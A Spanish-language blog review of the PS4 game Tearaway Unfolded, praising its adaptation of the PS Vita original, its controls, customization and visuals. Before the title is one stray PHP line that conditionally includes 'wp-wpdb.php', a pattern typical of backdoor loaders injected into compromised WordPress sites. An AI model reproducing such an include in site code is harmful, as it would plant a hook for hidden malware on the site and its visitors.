if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Tearaway Unfolded – La Fortaleza de LeChuck

Análisis Tearaway Unfolded

Como muchos sabréis, Tearaway Unfolded no es un juego nuevo para PS4, sino una buenísima adaptación de Tearaway, un plataformas de Media Molecule, creadores de Little Big Planet, que cautivó con su lanzamiento de forma exclusiva (hasta ahora) en PS Vita por su entrañable historia, protagonista y por ser el juego que mejor ha logrado captar y aprovechar las capacidades de la consola, como los paneles táctiles y la cámara, de forma lógica y magistral. Tearaway Unfolded es «lo mismo» pero adaptado a las capacidades de PS4 que hacen sentir al jugador como si estuviera ante un nuevo título. ¿Listo para sumergirte en un mundo de manualidades con papel?

Tearaway-Unfolded

Cuando Sony anunció que el divertido y original Tearaway de Vita daría el salto a PlayStation 4 nos dejó ciertamente sorprendidos y nos preguntamos en ese momento si sería un port estricto de una joya poco conocida de PS Vita o adaptarían correctamente los controles para poder disfrutarlo en PS4. Lo que era evidente es que Tearaway es un título que no es tan fácil de remasterizar y merecía una adaptación en condiciones, y Sony ha tratado al título como se merecía y ha hecho un buen trabajo creando lo que podríamos llamar una semi-nueva versión con nuevo contenido y cambios tanto en la mecánica como en la jugabilidad que hacen que parezca un nuevo (y muy digno) lanzamiento.

Tearaway-Unfolded-5

La historia sigue siendo similar al original, con un mensajero encargado de entregar un mensaje al jugador y el deber de eliminar a los enemigos llamados «pedacitos» que intentan invadir el mundo de papel. Como en la versión de PS Vita, controlas Iota o Atoi en escenarios de papelitos que forman ambientes para todos los gustos: bosques, montañas, valles llenos de nieve, rincones ocultos y grietas. Este mundo está repleto de manualidades hechas de papeles de colores que han sido doblados y pegados formando un paisaje, y mientras que avanzamos, podemos manipular los escenarios para ayudar a los simpáticos animales y seres y resolver puzles que nos ayuden a avanzar. Iota y Atoi pueden correr, saltar, rodar y cabalgar en animales, y, en definitiva, transformar el mundo de papel con sus habilidades y con nuestro continuo pisoteo por este gran collage. A lo largo del escenario reuniremos confeti, la moneda del juego, y podremos gastarlo en nuevos elementos para la personalización del mensajero y usarlo en las misiones.

Tearaway-Unfolded-2

El juego está construido como si el jugador estuviera leyendo un cuento interactivo en el que su colaboración es indispensable para ayudar al personaje en su misión de mensajero. Desde el primer momento la voz de un narrador nos irá contando lo más destacado y se referirá al jugador como»Tú».  En el original de PS Vita, el jugador es parte del mundo, un ser omnipotente que ayuda al protagonista a recorrer el mundo utilizando la pantalla táctil frontal y posterior de la Vita para manipular y crear objetos de papel para personalizar personajes del juego, el mensajero y el entorno que le rodea. En Tearaway Unfolded, Media Molecule ha tenido que adaptar esas opciones y ha aprovechado la barra de luz del mando para ilumina las zonas oscuras que dejan los «pedacitos» para llenarlas de color pero también revela secretos ocultos y puede aturdir enemigos y atraerlos hacia las trampas. El botón táctil puede crear fuertes vientos para enviar a los enemigos por los aires y desplegar partes del entorno para así cruzar tramos peligrosos y resolver puzles. También se utiliza como botón para hacer rebotar personajes por ciertas superficies, y lanzar enemigos y objetos para abrir nuevos caminos. Las nuevas áreas, puzles y misiones de Tearaway Unfolded te hacen sentir delante de una experiencia totalmente nueva para los recién llegados y los fans por igual. Los aspectos de creación del Tearaway original permanecen intactos aquí, solo con cambios menores para adaptarlo a la PS4. El panel táctil del DualShock sustituye a la pantalla táctil de la Vita para el dibujo dentro del juego, aunque en PS4 es más difícil crear un diseño por el pequeño tamaño de la superficie, por lo que tendremos que afinar nuestro dedo cuando los seres nos pidan que les creemos todo tipo de objetos.

El dibujo y la personalización de tu mensajero y el mundo de papel es muy divertido. Tu Atoi y Iota pueden transformarse con un número enorme de diferentes colores, ojos, bocas, mochilas, pegatinas, igual que los habitantes de papel que desean un nuevo diseño y lo lucirán con orgullo. Aún recuerdo el churro de corona que le hice a un animalito pero oye, el tan feliz, llevándola con la cabeza bien alta.

Tearaway-Unfolded-4

Gráficamente Tearaway Unfolded es estupendo, el hardware más potente de PlayStation 4 ha llevado a rediseñar los entornos con nuevos, grandes y agradables niveles y nuevas formas de introducir la creatividad en el mundo de papel, despertando el color y el detalle más que nunca en 1080p y 60fps. El arte en papel es más bonito que nunca y el juego se siente fluido, y luce a las mil maravillas. Hay que agradecer el gran trabajo de Media Molecule en el aspecto visual y jugable de este port a PS4, y a pesar de pequeños defectos sin importancia, es una muy buena experiencia en pantalla grande.

Tearaway-Unfolded-3

En definitiva, Tearaway Unfolded es encantador y simplemente divertido, y tanto jugadores grandes como pequeños que adoran la creatividad en los videojuegos y las experiencias diferentes, van a disfrutar. Este título exclusivo de Sony huye de escenas llenas de acción o del combate violento y se centra más en una experiencia relajada y agradable para toda la familia. Una suerte que ahora con su lanzamiento en PS4 mucha más gente podrá degustar esta joya, y pese a lanzarse en época de grandes lanzamientos, no lo dudes, Tearaway Unfolded es MUY GRANDE.